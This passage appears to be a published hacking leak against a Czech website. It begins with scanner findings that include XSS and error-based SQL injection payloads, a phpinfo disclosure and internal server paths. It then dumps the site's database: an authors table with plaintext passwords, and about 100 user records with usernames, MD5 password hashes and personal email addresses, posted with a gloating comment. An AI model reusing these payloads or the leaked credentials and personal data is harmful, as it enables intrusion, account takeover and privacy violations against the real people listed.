  575. URL: http://www.prdel.cz/clanek.php?id=122
  576. Parameter Name: id
  577. Parameter Type: Post
  578. Attack Pattern: '"--></style></script><script>netsparker(0x000483)</script>
  579.  
  580. ||| phpinfo() Information Disclosure
  581.  
  582. Severity : Low
  583. Confirmation: Confirmed
  584. URL: http://www.prdel.cz/phpinfo.php
  585. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  586.  
  587. ||| File Upload Functionality Identified
  588.  
  589. Severity : Information
  590. Confirmation: Confirmed
  591. URL: http://www.prdel.cz/registrace.php
  592. Form Name: ico
  593.  
  594. Severity : Information
  595. Confirmation: Confirmed
  596. URL: http://www.prdel.cz/reg_edit.php
  597. Form Name: ico
  598.  
  599.  
  600. ||| MySQL Database Identified
  601.  
  602. Severity : Information
  603. Confirmation: Confirmed
  604. URL: http://www.prdel.cz/rubrika.php?rub='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  605. Parameter Name: rub
  606. Parameter Type: Querystring
  607. Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
  608.  
  609. ||| Password Transmitted Over HTTP
  610.  
  611. Severity: Important
  612. Confirmation: Confirmed
  613. URL: http://www.prdel.cz/clanek.php?id=122
  614. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  615.  
  616. ||| E-mail Address Disclosure
  617.  
  618. Severity : Information
  619. Confirmation: Confirmed
  620. URL: http://www.prdel.cz/
  621. Found E-mails: polibte.nam@prdel.cz
  622. costrova@prdel.cz
  623.  
  624. Severity : Information
  625. Confirmation: Confirmed
  626. URL: http://www.prdel.cz/starsi_prispevky.php?co=
  627. Found E-mails: postreleny@gmail.com
  628. kanalnik987@seznam.cz
  629. admin@netlife.502.cz
  630. intelvodrazka@seznam.cz
  631. SexyRadaBieber@seznam.cz
  632. polibte.nam@prdel.cz
  633.  
  634.  
  635. ||| [Possible] Internal Path Leakage (*nix)
  636.  
  637. Severity : Information
  638. Confirmation: Confirmed
  639. URL: http://www.prdel.cz/phpinfo.php
  640. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  641. Identified Internal Path(s):
  642.  
  643. /usr/obj/usr/src/sys/GENERIC
  644. /usr/local/etc/php'
  645. /usr/local'
  646. /usr/local/man'
  647. /usr/local/info/'
  648. /usr/local/etc
  649. /usr/local/etc/php.ini
  650. /usr/local/etc/php
  651. /usr/local/etc/php/extensions.ini
  652. /var/log/php_errors.log
  653. /usr/local/lib/php/20090626
  654. /usr/local/share/pear
  655. /usr/sbin/sendmail -t -i
  656. /usr/sbin/sendmail
  657. /usr/home/costra/web/prdel.cz/www/phpinfo.php
  658. /usr/local/bin/php-cgi
  659. /usr/sbin:/usr/bin
  660. /usr/home/costra/web/prdel.cz/www
  661.  
  662. ||| report db:
  663.  
  664. Target: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
  665. Host IP: 127.0.0.1 (Proxy IP)
  666. Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
  667. Powered-by: PHP/5.3.8
  668. DB Server: MySQL
  669. Resp. Time(avg): 6465 ms
  670. Current User: prdel_cz@localhost
  671. Sql Version: 5.5.17
  672. Current DB: prdel_cz
  673. System User: prdel_cz@localhost
  674. Host Name: fubar.sigpipe.cz
  675. Installation dir: /usr/local
  676. DB User: 'prdel_cz'@'localhost'
  677. Data Bases: information_schema, prdel_cz, test
  678.  
  679. Data Base: prdel_cz
  680. Table: prd_autent
  681. Total Rows: 15
  682.  
  683. Column found: id
  684. Column found: jmeno
  685. Column found: heslo
  686. Column found: podpis
  687. Column found: mail
  688. Column found: funkce
  689. Column found: major
  690.  
  691. Count(*) of prdel_cz.prd_autent is 15
  692. //--------------------------------------------------------------------------------
  693. id jmeno heslo podpis mail funkce major
  694.  
  695. 1 costra kost22 Costra costrova@prdel.cz 2
  696. 2 sowanso route66 Sowanso sowansova@prdel.cz 2
  697. 3 bahamaz baha22 Bahamaz polibte.nam@prdel.cz redaktor 2
  698. 4 nikdo asxsfd22s polibte.nam@prdel.cz 0
  699. 5 blafunka blaf22 Blafunka redaktorka 1
  700. 6 neznamy nez22 0
  701. 7 krysar krysa22 Krysa redaktor redaktor 0
  702. 8 corvin cor22vin Corvin corvinova@prdel.cz 2
  703. 9 mucker muck22 Mucker 0
  704. 10 tiskar tisk22 tiska polibte.nam@prdel.cz 0
  705. 11 Blackfloyd bla22flo Blackfloyd blackfloyd@centrum.cz 0
  706. 12 Mic mi22c Mic 0
  707. 13 sob sob66 Sob jiri.sobotka@post.cz spoluredaktor 1
  708. 14 greenspace wwwqq Greenspace 0
  709. 15 redakce dsfreiou redakce polibte.nam@prdel.cz 0
  710. --------------------------------------------------------------------------------//
  711.  
  712. -----------------------------------------------------------------------------------**
  713. Count(*) of prdel_cz.prd_reg is 3614
  714.  
  715. Column found: id
  716. Column found: login
  717. Column found: heslo
  718. Column found: mail
  719. Column found: datum_reg
  720. Column found: zeme
  721. Column found: podpis
  722. Column found: opravneni
  723. Column found: popis
  724. Column found: posl_posta
  725. Column found: nova_posta
  726. Column found: edit
  727. Column found: od_datum
  728. Column found: do_datum
  729. Column found: id_vlozil
  730.  
  731. -- Added only the first 100 items ;)
  732.  
  733. id login heslo mail podpis popis
  734. 1 d7e77c835af3d2a803c1cf28d60575bc neregistrov
  735. 2 Costra 413a54249f7a332a50d2242b6f341c65 costrova@prdel.cz Costra
  736. 3 Sowanso 151de84cca69258b17375e2f44239191 sowansova@prdel.cz Sowanso redaktor press
  737. 4 mucker c430d630174a7562f316de1422d7aad0 mucker@acid.cz Mucker
  738. 7 zblnk a369371bfdee5bf8a86b7855a22dd4da kika_badinska@yahoo.com
  739. 8 Zuzanka c07fefbae558f73d32686dec591af0ac suzzn66@hotmail.com
  740. 9 Hajdalak cb9a573872ba723dca2c7200e94f5eae prdelac@atlas.cz
  741. 10 Achojda fad3d364b57482bc8554ffa0fc8b66d6 Petulka.broucek@email.cz
  742. 11 Blackfloyd fb166902e26da020adb9e98a06069b06 blackfloyd@centrum.cz Blackfloyd redaktor
  743. 12 mikasyko 53c04118df112c13a8c34b38343b9c10 mikasyko@quick.cz
  744. 13 Milhaus18 827ccb0eea8a706c4c34a16891f84e7b Mafiouzis@seznam.cz
  745. 14 BoB d38ee19a4815c4aeba48227913092a6e robert.m@seznam.cz Bob redaktor
  746. 15 kali 4e4f523705f88c7253fc492d5a45743a jacho@post.cz
  747. 16 Krysar 81dc9bdb52d04dc20036dbd8313ed055 Krysa retraktor s p??alou
  748. 17 Drag 4edb2dc80889b1aec708ec4730f22387 kenilej666rtep@seznam.cz
  749. 18 Mirage 6cdc2b547529980d7f5e3b049b5150c9 xmirage@seznam.cz
  750. 19 Jitulinka c004b41d7921885f30c6474346fd2093 jtomanova@atlas.cz
  751. 20 jeniffer 22cb90807a19a5e2044756b089fa43ff
  752. 21 juppe 4790dfcb68fb43663e5ea74812cfc303 juppe@post.cz
  753. 22 Polibte.mi 0bcd844c7341754504e7e7f7a6582612 royman@email.cz
  754. 23 DjEm 2ce1ec32abcc09b95e64b14a9 1f2 f0450c1 sexibj@seznam.cz
  755. 24 06b2af75179fb94be097af182a442a4a michalgavlik@atlas.cz
  756. 25 P.P. 6ad61cf51456e20a2b6d8db294314de8
  757. 26
  758. 27 Petrd petrdj@post.cz
  759. 28 lunochod f39e6bec5195ca34d8b1cd33573f32a3 bilk7a@gytu.cz
  760. 29 Test 098f6bcd4621d373cade4e832627b4f6
  761. 30 pusa a32afbe54e4fbab0c8c44c01f5b90792 lucie87@centrum.cz
  762. 31 Nick 92c3b916311a5517d9290576e3ea37ad nick.king@quick.cz
  763. 32 vakalva 00fb6e1a2b7112baa41a5d2a85a9b357 Ivaneckaa@atlas.cz
  764. 33 KiiX ea1d6af7146d36d87ec481c3bf83cb35 KiiX@centrum.cz
  765. 34 1stenly 519dbf3fae4a9af1c6b4b4a0fc381ef0
  766. 35 abdul b6575858aecddd94af4abc23a24bf5f2 abdul@easemail.com
  767. 36 Lilith 2aee1c40199c7754da766e61452612cc lilith.d@email.cz
  768. 37 K.C. e3928a3bc4be46516aa33a79bbdfdb08 k.c.goodspeed@seznam.cz
  769. 38 gulasmen 738a6457be8432bab553e21b4235dd97 gulasmen@centrum.cz
  770. 39 milan 4bff2b649206a5609914986c92d06e12 vo.lomnice@atlas.cz
  771. 45 Delvita 37b43a655dec0e3504142003fce04a07 Deathmetal.Deicide@seznam.cz
  772. 46 mutant pepa 6074c6aa3488f3c2dddff2a7ca821aab mutantpepa@seznam.cz
  773. 47 Guppy aa47f8215c6f30a0dcdb2a36a9f4168e daniel.bazant@worldonline.cz
  774. 48 Brom_O_berin cc1f891423db1ee24498e76f3b107bbe berin@seznam.cz Brom O`berin
  775. 49 Crysa 76d084c2c90b5a76e7f2ca9a1a2f3980
  776. 50 medulka 0ea711391df8d060f4f81141e192814e handa@can.com
  777. 51 Prd f5467257608e18e5347354fe9198309b Marcutio@seznam.cz
  778. 52 Krist b46b30c3eda21e2fd3337bd5c0c0d486 kristous@seznam.cz
  779. 53 Martin Philippi 034483eb25564607c159035ed87a0c21 philippim@seznam.cz
  780. 54 Aaliyah 6813ad2917a9674bdf5c8f8bb2a04deb wu@email.cz
  781. 55 Pavel ca3ec598002d2e7662e2ef4bdd58278b p.vosahlik@wo.cz
  782. 56 Fluke f5f2e5896162f870b47efde00fc12894 flukeho@email.cz
  783. 57 radek 25df35de87aa441b88f22a6c2a830a17 freeman.t@centrum.cz
  784. 58 blech 1cca5f8a2bc5f4cc5b0782325eea2ee1 blech@centrum.cz
  785. 59 Magoor b3e654e3acf57cfbe6eb7e4a682ac740 magoor@click.cz
  786. 60 Mrs love d9479746ea51a4177f8bc092c5db7b8d SvrcinovaM@seznam.cz
  787. 61 Lenunka a384b6463fc216a5f8ecb6670f86456a lenunka@centrum.cz
  788. 62 hnismatlavej 97edfa43843271c6a4146d888ba9696f barpos@post.cz
  789. 63 prdelnice 055705420655acce96cfe0ca22b38bcc narciska@freemejl.cz
  790. 64 perak 076e1f7429091d4688b28b0f4e3374d1
  791. 65 xzoombikx e10adc3949ba59abbe56e057f20f883e xzoombikx@freemejl.cz
  792. 66 sleeva f666a8be6b2e0c1f0f66c58060124316 euphorion@post.cz
  793. 67 Marcela e60c7e24808655f86ceed8cb7d3e536d MarcelaCh@seznam.cz
  794. 68 Marylin 4cbfe67340292113c37189ac59871696 a.vitkova@seznam.cz
  795. 69 Bossak 955db0b81ef1989b4a4dfeae8061a9a6 ilovelunetic@seznam.cz
  796. 70 Tom 9ad97add7f3d9f29cd262159d4540c96 tomaskonva@volny.cz
  797. 71 j 3e55517aea64f6d368ef836459f15182 tchlup@soubce.cz
  798. 72 Sexy.cat 5bbc1df343ed3672a1ffd93d2de417ae Sexy.cat@seznam.cz
  799. 73 bisekmartin 955db0b81ef1989b4a4dfeae8061a9a6 martin.bisek@worldonline.cz
  800. 74 PanKlobouk 8627652212182177254630a62f81d801 lord.edmond@centrum.cz
  801. 75 Shadya 318fbaf5acbf2b69a202de4c6df4cd2c Shadya@atlas.cz
  802. 76 Adam 7d3e28d14440d6c07f73b7557e3d9602 zead@post.cz
  803. 77 Sraida 153697b4d766ede6971ee05a9d42e86c -Dido-@quick.cz
  804. 78 Mistr 140548adadcd75f4918901e83de48ebd
  805. 79 Charlie bf779e0933a882808585d19455cd7937 k.kovar@email.cz
  806. 80 Giltanas 02b65838e9d004709a94c8b3b46f01b3 ronovskv@gjr.cz
  807. 81 Bolik ec733571061b115252c5e38269cce13f bolik@seznam.cz
  808. 82 milka 827ccb0eea8a706c4c34a16891f84e7b
  809. 83 roger 3aa26518a06fdd715a5c93af12d8cdc5
  810. 84 nicky2001 f39322759f5c3e0db8d32b41a3312904 nicky2001@seznam.cz
  811. 85 kocur cd62562929ed9d64a1fda3c911f9de9d
  812. 86 ZZsup c4459bc0bba5a7fd3a0ee521c2cbbc18 ZZsup@guick.cz
  813. 87 mecma a72e6e60313605028784645efb13ca5c mecma@seznam.cz
  814. 88 Dub 6d577dceec0057176f6a08dba512af40 doubek.jirka@quick.cz
  815. 89 kuglimug 59f9d76078b0422c34ce11f8bee61373
  816. 90 Hana 785bb1e5e77a14325fd31ebeae836fff H.Melkusova@seznam.cz
  817. 91 Olinka ecc5b00cf0f3653b868990f8e3c7243f olinka.stolfova@post.cz
  818. 92 Ivosek 0eacfc1178fe6ff4265ba27dc69656be IvoVelicka@seznam.cz
  819. 93 jitus ebd5057f5e0c63cd89fb41e30f3c0077
  820. 94 Cindy 76bd0d90a1b88cfec6068f88d6d04dff
  821. 95 88d52b35e5147c0115bcd5c5dd7f7e3f
  822. 96 maus007 fc5cdb17ceffded1e53d9be32e54ebb1 maus007@seznam.cz
  823. 97 dextra 587c5b83f70ff651700e3b75953fb9d7
  824. 98 martina 2f0714f5365318775c8f50d720a307dc
  825. 99 chozearmando 17e94cd7242c7f3b9022eacf5855fe91 chozearmando@xko.cz
  826. 100 satan 87df2cd1570fd297de238aeee667fe0a
  827.  
  828. -----------------------------------------------------------------------------------**